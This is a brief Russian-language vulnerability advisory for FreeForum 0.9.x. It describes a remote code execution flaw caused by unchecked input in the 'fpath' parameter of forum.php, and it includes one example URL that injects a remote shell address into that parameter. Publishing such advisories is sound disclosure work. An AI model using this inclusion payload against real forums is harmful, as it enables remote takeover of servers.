Программа: FreeForum 0.9.x

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки проверки входных данных в параметре «fpath” сценарием forum.php.

Пример:

http://www.example.com/forum.php?cfg_file=1&fpath=http://sh3LL?

Оставить мнение